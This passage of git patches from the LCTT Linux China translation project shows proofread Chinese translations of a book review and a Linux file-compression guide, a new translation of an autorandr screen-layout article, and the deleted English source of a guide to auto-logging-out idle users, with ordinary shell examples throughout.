-Mickey Metts在论文中这样形容, "与你的友好的社区型技术合作社相遇。(原文:Meet Your Friendly Neighborhood Tech Co-Op.)" Metts为一家名为Agaric的企业工作,这家企业使用Drupal为团体及小型企业建立他们不能独自完成的产品。除此以外, Metts还鼓励任何想要建立并运营自己的企业的公司或合作社的人接受免费且开源的软件。为什么呢?因为它是高质量的,不算昂贵的,可定制的,并且你能够与由乐于助人而又热情的人们组成的大型社区产生联系。
+Mickey Metts 在论文中这样形容, “邂逅你的友邻技术伙伴。" Metts 为一家名为 Agaric 的企业工作,这家企业使用 Drupal 为团体及小型企业建立他们不能自行完成的平台。除此以外, Metts 还鼓励任何想要建立并运营自己的企业的公司或合作社的人接受自由开源软件。为什么呢?因为它是高质量的、并不昂贵的、可定制的,并且你能够与由乐于助人而又热情的人们组成的大型社区产生联系。
### 不总是开源的,但开源总在
-这本书里不是所有的论文都聚焦或提及开源的;但是,开源方式的关键元素-合作,社区,开放管理以及电子自由化-总是在其表面若隐若现。
+这本书里不是所有的论文都关注或提及开源的;但是,开源方式的关键元素——合作、社区、开放治理以及电子自由化——总是在其间若隐若现。
-事实上正如《Ours to Hack and to Own》中许多论文所讨论的,建立一个更加开放,基于平常人的经济与社会区块,平台合作社会变得非常重要。用Douglas Rushkoff的话讲,那会是类似Creative Commons的组织“对共享知识资源的私有化”的补偿。它们也如Barcelona的CTO(首席执行官)Francesca Bria所描述的那样,是“通过确保市民数据安全性,隐私性和权利的系统”来运营他们自己的“分布式通用数据基础架构”的城市。
+事实上正如《Ours to Hack and to Own》中许多论文所讨论的,建立一个更加开放、基于平常人的经济与社会区块,平台合作社会变得非常重要。用 Douglas Rushkoff 的话讲,那会是类似 Creative Commons 的组织“对共享知识资源的私有化”的补偿。它们也如 Barcelona 的 CTO Francesca Bria 所描述的那样,是“通过确保市民数据安全性、隐私性和权利的系统”来运营他们自己的“分布式通用数据基础架构”的城市。
### 最后的思考
-如果你在寻找改变互联网的蓝图以及我们工作的方式,《Ours to Hack and to Own》并不是你要寻找的。这本书与其说是用户指南,不如说是一种宣言。如书中所说,《Ours to Hack and to Own》让我们略微了解如果我们将开源方式准则应用于社会及更加广泛的世界我们能够做的事。
+如果你在寻找改变互联网以及我们工作的方式的蓝图,《Ours to Hack and to Own》并不是你要寻找的。这本书与其说是用户指南,不如说是一种宣言。如书中所说,《Ours to Hack and to Own》让我们略微了解如果我们将开源方式准则应用于社会及更加广泛的世界我们能够做的事。
--------------------------------------------------------------------------------
作者简介:
-Scott Nesbitt -作家,编辑,雇佣兵,虎猫牛仔(原文:Ocelot wrangle),丈夫与父亲,博客写手,陶器收藏家。Scott正是做这样的一些事情。他还是大量写关于开源软件文章与博客的长期开源用户。你可以在Twitter,Github上找到他。
+Scott Nesbitt ——作家、编辑、雇佣兵、 虎猫牛仔、丈夫与父亲、博客写手、陶器收藏家。Scott 正是做这样的一些事情。他还是大量写关于开源软件文章与博客的长期开源用户。你可以在 Twitter、Github 上找到他。
--------------------------------------------------------------------------------
@@ -50,7 +51,7 @@ via: https://opensource.com/article/17/1/review-book-ours-to-hack-and-own
作者:[Scott Nesbitt][a]
译者:[darsh8](https://github.com/darsh8)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 33d045f17df06e68833800d253799e28a49dd56d Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 23:06:25 +0800
Subject: [PATCH 183/371] PUB:20170131 Book review Ours to Hack and to Own.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@darsh8 文章首发地址: https://linux.cn/article-9220-1.html
你的 LCTT 专页地址: https://linux.cn/lctt/darsh8
加油!
---
.../20170131 Book review Ours to Hack and to Own.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/talk => published}/20170131 Book review Ours to Hack and to Own.md (100%)
diff --git a/translated/talk/20170131 Book review Ours to Hack and to Own.md b/published/20170131 Book review Ours to Hack and to Own.md
similarity index 100%
rename from translated/talk/20170131 Book review Ours to Hack and to Own.md
rename to published/20170131 Book review Ours to Hack and to Own.md
From 03f86d8148b6c0c0eda07cc7ede2359fe58f38e4 Mon Sep 17 00:00:00 2001
From: wxy
Date: Tue, 9 Jan 2018 00:17:46 +0800
Subject: [PATCH 184/371] PRF:20171214 How to squeeze the most out of Linux
file compression.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@singledo 恭喜你,完成了第一篇翻译贡献(抱歉没及时看到,校对发布晚了)。请根据我的校对,了解你需要注意的格式方面的调整。
---
...all and use encryptpad on ubuntu 16.04.md} | 0
... the most out of Linux file compression.md | 92 ++++++++++++-------
2 files changed, 60 insertions(+), 32 deletions(-)
rename translated/tech/{How to install and use encryptpad on ubuntu 16.04.md => 20171214 How to install and use encryptpad on ubuntu 16.04.md} (100%)
diff --git a/translated/tech/How to install and use encryptpad on ubuntu 16.04.md b/translated/tech/20171214 How to install and use encryptpad on ubuntu 16.04.md
similarity index 100%
rename from translated/tech/How to install and use encryptpad on ubuntu 16.04.md
rename to translated/tech/20171214 How to install and use encryptpad on ubuntu 16.04.md
diff --git a/translated/tech/20171214 How to squeeze the most out of Linux file compression.md b/translated/tech/20171214 How to squeeze the most out of Linux file compression.md
index f844719399..92a51322c2 100644
--- a/translated/tech/20171214 How to squeeze the most out of Linux file compression.md
+++ b/translated/tech/20171214 How to squeeze the most out of Linux file compression.md
@@ -1,7 +1,13 @@
-如何优雅的使用大部分的 Linux 文件压缩
+如何在 Linux 上使用文件压缩
=======
- 如果你对 linux 系统下的对文件压缩命令或操作的有效性有任何疑问 ,你应该看一下 **apropos compress** 这个命令的输出 ;如果你有机会这么做 ,你会惊异于有如此多的的命令来进行压缩文件和解压缩文件 ;还有许多命令来进行压缩文件的比较 ,检验 ,并且能够在压缩文件中的内容中进行搜索 ,甚至能够把压缩文件从一个格式变成另外一种格式 ( *.z 格式变为 *.gz 格式 ) 。
- 你想在所有词目中寻找一组 bzip2 的压缩命令 。包括 zip ,gzip ,和 xz 在内 ,你将得到一个有意思的操作。
+
+![](https://images.idgesg.net/images/article/2017/12/snake-bus-100743983-large.jpg)
+
+> Linux 系统为文件压缩提供了许多选择,关键是选择一个最适合你的。
+
+如果你对可用于 Linux 系统的文件压缩命令或选项有任何疑问,你也许应该看一下 `apropos compress` 这个命令的输出。如果你有机会这么做,你会惊异于有如此多的命令可以进行文件压缩和解压缩;此外还有许多命令可以对压缩文件进行比较、检验,并且能够在压缩文件的内容中进行搜索,甚至能够把压缩文件从一种格式变成另外一种格式(如,将 `.z` 格式变为 `.gz` 格式)。
+
+你可以看到只是适用于 bzip2 压缩的全部条目就有这么多。加上 zip、gzip 和 xz 在内,你会有非常多的选择。
```
$ apropos compress | grep ^bz
@@ -17,16 +23,19 @@ $ apropos compress | grep ^bz
bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text
```
- 在我的Ubuntu系统上 ,列出了超过 60 条命令作为 apropos compress 命令的返回 。
+在我的 Ubuntu 系统上 ,`apropos compress` 命令的返回中列出了 60 条以上的命令。
-## 压缩算法
- 压缩并没有普适的方案 ,某些压缩工具是有损耗的压缩 ,例如能够使 mp3 文件减小大小而能够是听者有接近聆听原声的音乐感受 。但是 Linux 命令行能够用算法使压缩文件或档案文件能够重新恢复为原始数据 ,换句话说 ,算法能够使压缩或存档无损 。
+### 压缩算法
- 这是如何做到的 ?300 个相同的在一行的相同的字符能够被压缩成像 “300x” 。但是这种算法不会对大多数的文件产生有效的益处 。因为文件中完全随机的序列要比相同字符的序列要多的多 。 压缩算法会越来越复杂和多样 ,所以在 Unix 早期 ,压缩是第一个被介绍的 。
+压缩并没有普适的方案,某些压缩工具是有损压缩,例如用来缩小 mp3 文件的那类压缩,可以让聆听者获得接近原声的音乐体验。但是在 Linux 命令行上压缩或归档用户文件所使用的算法必须能够精确地重新恢复为原始数据。换句话说,它们必须是无损的。
-## 在 Linux 系统上的压缩命令
- 在 Linux 系统上最常用的压缩命令是 zip ,gzip ,bzip2 ,xz 。 前面提到的常用压缩命令以同样的方式工作 。会权衡文件内容压缩程度 ,压缩花费的时间 ,压缩文件在其他你需要使用的系统上的兼容性 。
- 一些时候压缩一个文件并不会花费很多时间和性能 。在下面的例子中 ,被压缩的文件会比原始文件要大 。当在一个不是很普遍的情况下 ,尤其是在文件内容达到一定等级的随机度 。
+这是如何做到的?假设一行上有 300 个相同的字符,它可以被压缩成类似 "300x" 这样的字符串;但这种算法对大多数文件帮助不大,因为文件内容中完全随机的序列远比长串相同字符的序列常见得多。压缩算法要复杂得多,而且从 Unix 早期引入压缩功能以来,它们一直在变得越来越复杂。
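+
+无论算法多么复杂,"无损"这一点都可以自行验证。下面是一个小示意(文件名是假设的;`cmp` 在两个文件完全一致时不会有任何输出):
+
+```
+cp somefile somefile.orig      # 先留一份原始副本
+gzip somefile                  # 生成 somefile.gz,并删除原文件
+gunzip somefile.gz             # 还原出 somefile
+cmp somefile somefile.orig && echo "内容完全一致,压缩是无损的"
+```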
+
+### 在 Linux 系统上的压缩命令
+
+在 Linux 系统上最常用的文件压缩命令包括 `zip`、`gzip`、`bzip2`、`xz`。所有这些压缩命令都以类似的方式工作,但是你需要在文件能被压缩的程度(节省多少空间)、压缩花费的时间、压缩文件在其他你需要使用的系统上的兼容性之间进行权衡。
+
+有时压缩一个文件并不会花费很多时间和精力。在下面的例子中,被压缩的文件实际上比原始文件还要大。这并不是一个常见情况,但有可能发生 —— 尤其是当文件内容具有相当程度的随机性时。
```
$ time zip bigfile.zip bigfile
@@ -38,10 +47,14 @@ $ ls -l bigfile*
-rw-r--r-- 1 root root 0 12月 20 22:36 bigfile
-rw------- 1 root root 164 12月 20 22:41 bigfile.zip
```
- 注意压缩后的文件 ( bigfile.zip ) 比源文件 ( bigfile ) 要大 。如果压缩增加了文件的大小或者减少的很少的百分比 ,那就只剩下在线备份的好处了 。如果你在压缩文件后看到了下面的信息 。你不会得到太多的益处 。
- ( defalted 1% )
- 文件内容在文件压缩的过程中有很重要的作用 。在上面文件大小增加的例子中是因为文件内容过于随机 。压缩一个文件内容只包含 0 的文件 。你会有一个相当震惊的压缩比 。在如此极端的情况下 ,三个常用的压缩工具都有非常棒的效果 。
+注意该文件压缩后的版本(`bigfile.zip`)比原始文件(`bigfile`)还要大。如果压缩增加了文件的大小,或者只减少了很小的比例,那么也许剩下的唯一好处就是便于在线备份了。如果你在压缩文件后看到了下面的信息,说明你并没有从压缩中得到什么收益。
+
+```
+ ( defalted 1% )
+```
+
+文件内容在压缩过程中起着很重要的作用。在上面文件大小增加的例子中,就是因为文件内容过于随机。而压缩一个内容只包含 `0` 的文件,你会得到一个相当惊人的压缩比。在如此极端的情况下,三个常用的压缩工具都有非常出色的效果。
```
-rw-rw-r-- 1 shs shs 10485760 Dec 8 12:31 zeroes.txt
@@ -50,8 +63,10 @@ $ ls -l bigfile*
-rw-rw-r-- 1 shs shs 1660 Dec 8 12:31 zeroes.txt.xz
-rw-rw-r-- 1 shs shs 10360 Dec 8 12:24 zeroes.zip
```
- 你不会喜欢为了查看文件中的 50 个字节的而将 10 0000 0000 字节的数据完全解压 。这样是及其不可能的 。
- 在更真实的情况下 ,大小差异是总体上的不同 -- 不是重大的效果 -- 对于一个小的公正的 jpg 的图片文件 。
+
+令人印象深刻的是,一个超过 1000 万字节的文件竟能压缩到不足 50 字节;不过你不太可能真的遇到这种情况,因为基本上不会有内容如此单一的文件。
+
+在更真实的情况下,大小差异各有不同,但都不算显著,比如下面这个并不算大的 jpg 图片文件。
```
-rw-r--r-- 1 shs shs 13522 Dec 11 18:58 image.jpg
@@ -61,7 +76,8 @@ $ ls -l bigfile*
-rw-r--r-- 1 shs shs 13581 Dec 11 18:58 image.jpg.zip
```
- 在压缩拉的文本文件时 ,你会发现重要的不同 。
+而在对较大的文本文件做同样的压缩时,你会看到显著的差异。
+
```
$ ls -l textfile*
-rw-rw-r-- 1 shs shs 8740836 Dec 11 18:41 textfile
@@ -71,11 +87,11 @@ $ ls -l textfile*
-rw-rw-r-- 1 shs shs 1977808 Dec 11 18:41 textfile.zip
```
- 在这种情况下 ,XZ 相较于其他压缩文件有效的减小了文件的大小 ,对于第二的 bzip2 命令也有很大的提高
+在这种情况下,`xz` 相较于其他压缩命令明显更有效地减小了文件大小,紧随其后的是 bzip2 命令。
-## 查看压缩文件
+### 查看压缩文件
- 以 more 结尾的命令能够让你查看压缩文件而不解压文件 。
+这些以 `more` 结尾的命令(`bzmore` 等等)能够让你查看压缩文件的内容而不需要解压文件。
```
bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text
@@ -83,33 +99,45 @@ lzmore (1) - view xz or lzma compressed (text) files
xzmore (1) - view xz or lzma compressed (text) files
zmore (1) - file perusal filter for crt viewing of compressed text
```
- 这些命令在大多数工作中被使用 ,自从不得不使文件解压缩而只为了显示给用户 。在另一方面 ,留下被解压的文件在系统中 。这些命令简单的使文件解压缩 。
+
+为了把压缩文件的内容解压出来显示给你,这些命令做了不少计算。但另一方面,它们不会把解压后的文件留在你的系统上,而只是即时解压所需要的部分。
```
$ xzmore textfile.xz | head -1
Here is the agenda for tomorrow's staff meeting:
```
-## 比较压缩文件
- 许多的压缩工具箱包含一个差异命令 ( 例如 :xzdiff ) 。这些工具通过这些工作来进行比较和差异而不是做算法指定的比较 。例如 ,xzdiff 命令比较 bz2 类型的文件和比较 xz 类型的文件一样简单 。
+### 比较压缩文件
-## 如何选择最好的 Linux 压缩工具
- 如何选择压缩工具取决于你工作 。在一些情况下 ,选择取决于你所压缩的数据内容 。在更多的情况下 ,取决你你组织的惯例 ,除非你对磁盘空间有着很高的敏感度 。下面是一般的建议 :
- zip :文件需要被分享或者会在 Windows 系统下使用 。
- gzip :文件在 Unix/Linux 系统下使用 。长远来看 ,bzip2 是普遍存在的 。
- bzip2 :使用了不同的算法 ,产生比 gzip 更小的文件 ,但是花更长的时间 。
- xz :一般提供做好的压缩率 ,但是也会花费相当的时间 。比其他工具更新 ,可能在你工作的系统上不存在 。
+有几个压缩工具包提供了差异比较命令(例如 `xzdiff`),这些工具把比较工作交给 `cmp` 和 `diff` 来完成,而不是做特定于压缩算法的比较。例如,用 `xzdiff` 比较 bz2 类型的文件和比较 xz 类型的文件一样简单。
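+
+下面是一个简单的用法示意(文件名是假设的;这类命令会在需要时自行解压再比较,无需手动解压):
+
+```
+# 直接比较两个 xz 压缩文件的内容
+xzdiff config-v1.xz config-v2.xz
+# 同样可以比较 bzip2 压缩的文件
+xzdiff notes-v1.bz2 notes-v2.bz2
+```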
-## 注意
- 当你在压缩文件时,你有很多选择 ,在极少的情况下 ,会产生无效的磁盘存储空间。
+### 如何选择最好的 Linux 压缩工具
+
+如何选择压缩工具取决于你的工作。在一些情况下,选择取决于你所压缩的数据内容。在更多的情况下,则取决于你组织内的惯例,除非你对磁盘空间特别敏感。下面是一般性建议:
+
+**zip** 最适合需要分享给他人、或者要在 Windows 系统下使用的文件。
+
+**gzip** 或许对你要在 Unix/Linux 系统下使用的文件是最好的。虽然 bzip2 已经接近普及,但 gzip 看起来仍将长期存在。
+
+**bzip2** 使用了和 gzip 不同的算法,并且会产生比 gzip 更小的文件,但是它们需要花费更长的时间进行压缩。
+
+**xz** 通常可以提供最好的压缩率,但是也会花费相当长的时间。它比其他工具更新一些,可能在你工作的系统上还不存在。
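+
+如果拿不定主意,可以先在自己的典型数据上做个简单对比。下面是一个粗略的示意脚本(假设这几个工具都已安装,文件名也是假设的;脚本会就地生成压缩文件,请先在副本上试验):
+
+```
+f=sample.data
+for cmd in gzip bzip2 xz; do
+    cp "$f" "$f.tmp"
+    time $cmd "$f.tmp"      # 粗略看一下每种工具的耗时
+    ls -l "$f.tmp".*        # 查看各自压缩后的大小
+    rm -f "$f.tmp".*
+done
+```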
+
+### 注意
+
+在压缩文件时,你有很多选择,而在极少的情况下,并不能有效节省磁盘存储空间。
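+
+如果想确认某次压缩到底划不划算,可以让压缩工具自己报告压缩比,例如 gzip 的 `-l` 选项(文件名是假设的):
+
+```
+# 列出压缩前后的大小以及压缩比
+gzip -l somefile.gz
+```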
--------------------------------------------------------------------------------
+
via: https://www.networkworld.com/article/3240938/linux/how-to-squeeze-the-most-out-of-linux-file-compression.html
-作者 :[ Sandra Henry-Stocker ][1] 译者:[ singledo ][2] 校对:校对者ID
+作者:[Sandra Henry-Stocker][1]
+译者:[singledo][2]
+校对:[wxy][4]
本文由 [ LCTT ][3]原创编译,Linux中国 荣誉推出
[1]:https://www.networkworld.com
[2]:https://github.com/singledo
-[3]:https://github.com/LCTT/TranslateProject
\ No newline at end of file
+[3]:https://github.com/LCTT/TranslateProject
+[4]:https://github.com/wxy
\ No newline at end of file
From 128c2ef3ca7a301dcd8089f793b99e64bf3e4a21 Mon Sep 17 00:00:00 2001
From: wxy
Date: Tue, 9 Jan 2018 00:18:59 +0800
Subject: [PATCH 185/371] PUB:20171214 How to squeeze the most out of Linux
file compression.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@singledo 文章首发地址: https://linux.cn/article-9221-1.html
你的 LCTT 专页地址: https://linux.cn/lctt/singledo
加油!
---
...71214 How to squeeze the most out of Linux file compression.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171214 How to squeeze the most out of Linux file compression.md (100%)
diff --git a/translated/tech/20171214 How to squeeze the most out of Linux file compression.md b/published/20171214 How to squeeze the most out of Linux file compression.md
similarity index 100%
rename from translated/tech/20171214 How to squeeze the most out of Linux file compression.md
rename to published/20171214 How to squeeze the most out of Linux file compression.md
From 4e05541a8ece5b28ca1c14c514e5d42f123cc808 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Tue, 9 Jan 2018 08:19:52 +0800
Subject: [PATCH 186/371] Translating by stevenzdg988
---
...1231 Making Vim Even More Awesome With These Cool Features.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md b/sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
index f920aadc96..05611d8482 100644
--- a/sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
+++ b/sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
@@ -1,3 +1,4 @@
+Translating by stevenzdg988
Making Vim Even More Awesome With These Cool Features
======
From 3e4262ae08938082c64cd631408cd64b319ef30c Mon Sep 17 00:00:00 2001
From: geekpi
Date: Tue, 9 Jan 2018 09:12:05 +0800
Subject: [PATCH 187/371] translated
---
...ndr- automatically adjust screen layout.md | 52 -------------------
...ndr- automatically adjust screen layout.md | 50 ++++++++++++++++++
2 files changed, 50 insertions(+), 52 deletions(-)
delete mode 100644 sources/tech/20171106 Autorandr- automatically adjust screen layout.md
create mode 100644 translated/tech/20171106 Autorandr- automatically adjust screen layout.md
diff --git a/sources/tech/20171106 Autorandr- automatically adjust screen layout.md b/sources/tech/20171106 Autorandr- automatically adjust screen layout.md
deleted file mode 100644
index c9ad9b8182..0000000000
--- a/sources/tech/20171106 Autorandr- automatically adjust screen layout.md
+++ /dev/null
@@ -1,52 +0,0 @@
-translating---geekpi
-
-Autorandr: automatically adjust screen layout
-======
-Like many laptop users, I often plug my laptop into different monitor setups (multiple monitors at my desk, projector when presenting, etc.) Running xrandr commands or clicking through interfaces gets tedious, and writing scripts isn't much better.
-
-Recently, I ran across [autorandr][1], which detects attached monitors using EDID (and other settings), saves xrandr configurations, and restores them. It can also run arbitrary scripts when a particular configuration is loaded. I've packed it, and it is currently waiting in NEW. If you can't wait, the [deb is here][2] and the [git repo is here][3].
-
-To use it, simply install the package, and create your initial configuration (in my case, undocked):
-```
- autorandr --save undocked
-
-```
-
-then, dock your laptop (or plug in your external monitor(s)), change the configuration using xrandr (or whatever you use), and save your new configuration (in my case, workstation):
-```
-autorandr --save workstation
-
-```
-
-repeat for any additional configurations you have (or as you find new configurations).
-
-Autorandr has `udev`, `systemd`, and `pm-utils` hooks, and `autorandr --change` should be run any time that new displays appear. You can also run `autorandr --change` or `autorandr --load workstation` manually too if you need to. You can also add your own `~/.config/autorandr/$PROFILE/postswitch` script to run after a configuration is loaded. Since I run i3, my workstation configuration looks like this:
-```
- #!/bin/bash
-
- xrandr --dpi 92
- xrandr --output DP2-2 --primary
- i3-msg '[workspace="^(1|4|6)"] move workspace to output DP2-2;'
- i3-msg '[workspace="^(2|5|9)"] move workspace to output DP2-3;'
- i3-msg '[workspace="^(3|8)"] move workspace to output DP2-1;'
-
-```
-
-which fixes the dpi appropriately, sets the primary screen (possibly not needed?), and moves the i3 workspaces about. You can also arrange for configurations to never be run by adding a `block` hook in the profile directory.
-
-Check it out if you change your monitor configuration regularly!
-
---------------------------------------------------------------------------------
-
-via: https://www.donarmstrong.com/posts/autorandr/
-
-作者:[Don Armstrong][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.donarmstrong.com
-[1]:https://github.com/phillipberndt/autorandr
-[2]:https://www.donarmstrong.com/autorandr_1.2-1_all.deb
-[3]:https://git.donarmstrong.com/deb_pkgs/autorandr.git
diff --git a/translated/tech/20171106 Autorandr- automatically adjust screen layout.md b/translated/tech/20171106 Autorandr- automatically adjust screen layout.md
new file mode 100644
index 0000000000..4dc8095669
--- /dev/null
+++ b/translated/tech/20171106 Autorandr- automatically adjust screen layout.md
@@ -0,0 +1,50 @@
+Autorandr:自动调整屏幕布局
+======
+像许多笔记本用户一样,我经常将笔记本插入到不同的显示器上(桌面上有多台显示器,演示时有投影机等)。运行 xrandr 命令或点击界面非常繁琐,编写脚本也不是很好。
+
+最近,我遇到了 [autorandr][1],它使用 EDID(和其他设置)检测连接的显示器,保存 xrandr 配置并恢复它们。它也可以在加载特定配置时运行任意脚本。我已经打包了它,目前仍在 NEW 状态。如果你不能等待,[这是 deb][2],[这是 git 仓库][3]。
+
+要使用它,只需安装软件包,并创建你的初始配置(我这里是 undocked):
+```
+ autorandr --save undocked
+
+```
+
+然后,连接你的笔记本(或者插入你的外部显示器),使用 xrandr(或其他任何)更改配置,然后保存你的新配置(我这里是 workstation):
+```
+autorandr --save workstation
+
+```
+
+对你额外的配置(或当你有新的配置)进行重复操作。
+
+Autorandr 有 `udev`、`systemd` 和 `pm-utils` 钩子,当新的显示器出现时,都应该运行一次 `autorandr --change`。如果需要,你也可以手动运行 `autorandr --change` 或 `autorandr --load workstation`。你还可以添加自己的 `~/.config/autorandr/$PROFILE/postswitch` 脚本,在某个配置加载完成后运行。由于我运行 i3,我的工作站配置如下所示:
+```
+ #!/bin/bash
+
+ xrandr --dpi 92
+ xrandr --output DP2-2 --primary
+ i3-msg '[workspace="^(1|4|6)"] move workspace to output DP2-2;'
+ i3-msg '[workspace="^(2|5|9)"] move workspace to output DP2-3;'
+ i3-msg '[workspace="^(3|8)"] move workspace to output DP2-1;'
+
+```
+
+它适当地修正了 dpi,设置了主屏幕(可能不需要?),并移动了 i3 工作区。你也可以在某个配置的目录中添加一个 `block` 钩子,让该配置永远不会被应用。
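+
+一个最小的示意(配置名 undocked 只是假设;`block` 钩子的确切语义请以 autorandr 自身的文档为准,这里只演示按上文所说在配置目录中放置一个钩子脚本):
+
+```
+# 在 undocked 配置目录里放一个可执行的 block 钩子
+cat > ~/.config/autorandr/undocked/block <<'EOF'
+#!/bin/bash
+# 这里可以按需加入判断逻辑;该钩子用来阻止 autorandr 应用这个配置
+EOF
+chmod +x ~/.config/autorandr/undocked/block
+```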
+
+如果你经常改变显示器的连接配置,不妨试试它!
+
+--------------------------------------------------------------------------------
+
+via: https://www.donarmstrong.com/posts/autorandr/
+
+作者:[Don Armstrong][a]
+译者:[geekpi](https://github.com/geekpi)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.donarmstrong.com
+[1]:https://github.com/phillipberndt/autorandr
+[2]:https://www.donarmstrong.com/autorandr_1.2-1_all.deb
+[3]:https://git.donarmstrong.com/deb_pkgs/autorandr.git
From 3fcc6e85847b3f7c70b46f817bfebcd44d1b3bed Mon Sep 17 00:00:00 2001
From: geekpi
Date: Tue, 9 Jan 2018 09:15:07 +0800
Subject: [PATCH 188/371] translating
---
...t Linux Desktop To Default Settings With A Single Command.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md b/sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md
index 84d60dae91..a5f819da51 100644
--- a/sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md
+++ b/sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md
@@ -1,3 +1,5 @@
+translating---geekpi
+
Reset Linux Desktop To Default Settings With A Single Command
======
![](https://www.ostechnix.com/wp-content/uploads/2017/10/Reset-Linux-Desktop-To-Default-Settings-720x340.jpg)
From 7c15c307e6bcbee1fa28c97ecd0c94acb1e24175 Mon Sep 17 00:00:00 2001
From: jessie-pang <35220454+jessie-pang@users.noreply.github.com>
Date: Tue, 9 Jan 2018 10:12:31 +0800
Subject: [PATCH 189/371] Update 20170925 Linux Free Command Explained for
Beginners (6 Examples).md
---
...5 Linux Free Command Explained for Beginners (6 Examples).md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md b/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
index 9cdd4c4b1c..5773719420 100644
--- a/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
+++ b/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
@@ -1,3 +1,5 @@
+Translating by jessie-pang
+
Linux Free Command Explained for Beginners (6 Examples)
======
From 74509026986f3b1cf2159754e11986d2eebd0cdf Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 13:03:19 +0800
Subject: [PATCH 190/371] translate done: 20170916 How To Auto Logout Inactive
Users After A Period Of Time In Linux.md
---
...e Users After A Period Of Time In Linux.md | 135 ------------------
...e Users After A Period Of Time In Linux.md | 131 +++++++++++++++++
2 files changed, 131 insertions(+), 135 deletions(-)
delete mode 100644 sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
create mode 100644 translated/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
diff --git a/sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md b/sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
deleted file mode 100644
index ad6ac12b1d..0000000000
--- a/sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
+++ /dev/null
@@ -1,135 +0,0 @@
-translating by lujun9972
-How To Auto Logout Inactive Users After A Period Of Time In Linux
-======
-
-![](https://www.ostechnix.com/wp-content/uploads/2017/09/logout-720x340.jpg)
-
-Let us picture this scenario. You have a shared server which is regularly being accessed by many users from all systems in the network. There are chances that some user may forget to logout his session and left the session open. As we all know, leaving an user session open is dangerous. Some users may do some damage intentionally. Would you, as a system admin, go and check each and every system to verify whether the users have logged out or not? Not necessary. Also, It's quite time consuming process if you have hundreds of machines in your network. Instead, you can make an user to auto logout from a local or SSH session after a particular period of inactivity. This brief tutorial describes how to auto logout inactive users after a particular period of time in Unix-like systems. It's not that difficult. Follow me.
-
-### Auto Logout Inactive Users After A Period Of Time In Linux
-
-We can do it in three ways. Let us see the first method.
-
-**Method 1:**
-
-Edit **~/.bashrc** or **~/.bash_profile** file:
-```
-$ vi ~/.bashrc
-```
-
-Or,
-```
-$ vi ~/.bash_profile
-```
-
-Add the following lines in it.
-```
-TMOUT=100
-```
-
-This makes the user to logout automatically after an inactivity of 100 seconds. You can define this value as per your convenient. Save and close the file.
-
-Apply the changes by running the following command:
-```
-$ source ~/.bashrc
-```
-
-Or,
-```
-$ source ~/.bash_profile
-```
-
-Now, leave the session idle for 100 seconds. After an inactivity of 100 seconds, you will see the following message and the user will automatically logged out from the session.
-```
-timed out waiting for input: auto-logout
-Connection to 192.168.43.2 closed.
-```
-
-This setting can be easily modified by the user. Because, ~/.bashrc file is owned by the user himself.
-
-To modify or delete this timeout settings, simply delete the lines added above and apply the changes by running "source ~/.bashrc" command.
-
-Alternatively, the user can disable this by running the following commands:
-```
-$ export TMOUT=0
-```
-
-Or,
-```
-$ unset TMOUT
-```
-
-If you want to prevent the user from changing the settings, follow second method instead.
-
-**Method 2:**
-
-Log in as root user.
-
-Create a new file called **" autologout.sh"**.
-```
-# vi /etc/profile.d/autologout.sh
-```
-
-Add the following lines:
-```
-TMOUT=100
-readonly TMOUT
-export TMOUT
-```
-
-Save and close the file.
-
-Make it as executable using command:
-```
-# chmod +x /etc/profile.d/autologout.sh
-```
-
-Now, logout or reboot your system. The inactive user will automatically be logged out after 100 seconds. The normal user can't change this settings even if he/she wanted to stay in the session. They will be thrown out exactly after 100 seconds.
-
-These two methods are are applicable for both local session and remote session i.e the locally logged-in users or and/or the users logged-in from a remote system via SSH. Next we are going to see how to automatically logout only the inactive SSH sessions, not local sessions.
-
-**Method 3:**
-
-In this method, we will only making the SSH session users to log out after a particular period of inactivity.
-
-Edit **/etc/ssh/sshd_config** file:
-```
-$ sudo vi /etc/ssh/sshd_config
-```
-
-Add/modify the following lines:
-```
-ClientAliveInterval 100
